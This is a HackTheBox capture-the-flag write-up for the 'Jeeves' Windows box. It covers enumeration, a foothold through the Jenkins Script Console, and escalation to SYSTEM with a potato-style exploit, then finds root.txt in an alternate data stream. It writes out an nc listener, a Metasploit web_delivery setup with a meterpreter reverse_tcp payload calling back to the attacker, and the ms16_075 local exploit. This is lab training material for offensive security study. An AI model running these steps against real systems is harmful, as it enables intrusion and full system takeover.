Write-Ups
  • Intro
  • Active Directory
    • HTB | Forest
    • HTB | Sauna
    • HTB | Active
    • HTB | Blackfield
    • HTB | Resolute
    • HTB | Cascade
    • HTB | Cicada
    • HTB | Administrator
    • HTB | Authority
    • HTB | Office
  • Windows
    • HTB | Devel
    • HTB | Chatterbox
    • HTB | SecNotes
    • HTB | Access
    • HTB | Jeeves
    • HTB | Artic
    • HTB | Bastard
    • HTB | Bastion
    • HTB | Querier
  • Linux
    • HTB | BoardLight
    • THM | CMess
    • THM | ConvertMyVideo
    • HTB | Editorial
    • HTB | Mirai
    • HTB | Nibbles
    • HTB | Help
    • HTB | SwagShop
    • HTB | Jarvis
    • HTB | Sea
    • HTB | Chemistry
Powered by GitBook
On this page
  • NMAP
  • port 80
  • port 50000
  • Foothold/ shell
  • Priv Esc
  1. Windows

HTB | Jeeves

PreviousHTB | AccessNextHTB | Artic

Last updated 8 months ago

This is a Windows box. You can find it here.

Skill Learned

  • Obtaining shell through Jenkins

  • Enumerating alternate data streams

NMAP

IP: 10.10.10.63

port 80

Throwing Stack Trace on searching

From this, we know they are using

  • ASP.NET Version 2.0.5

  • MS SQL Server 2005

Now Let's look at port 50000

port 50000

Let's do gobuster

We found /askjeeves

On visiting we found that it was Jenkins

Foothold/ shell

On visiting Manage Jenkins > Script Console We can execute Groovy scripts, refer.

Start nc listener and run

We got the shell

We found user.txt

Priv Esc

We have SEImpersonatePrivilege token

Since SeImpersonate is Enabled, that means we can do potato attack, we will be using MSF for that

we will use exploit/multi/script/web_delivery to get a shell on msf via our existing shell

use exploit/multi/script/web_delivery 
set srvhost tun0 
set lhost tun0 
set target PSH 
set payload windows/meterpreter/reverse_tcp 
run

copy the output of PowerShell cmd to our existing shell and boom we have meterpreter

Now we will use post/multi/recon/local_exploit_suggester to find exploits

found some exploits

Let's use exploit/windows/local/ms16_075_reflection_juicy, set the session and hit run

Boom we are NT AUTHORITY\SYSTEM. But we did not found the root.txt instead there is hm.txt

Let's look deeper 

dir /R

We found hm.txt:root.txt:$DATA

more < hm.txt:root.txt:$DATA

and we have root.txt

Always look for Alternative data streams.

rustscan
nmap
port 80
stack trace
port 50000
gobuster
/askjeeves
groovy script
nc -nlvp 1234
user.txt
whoami /priv
local_exploit_suggester
NT Authority\SYSTEM
dir /R
root.txt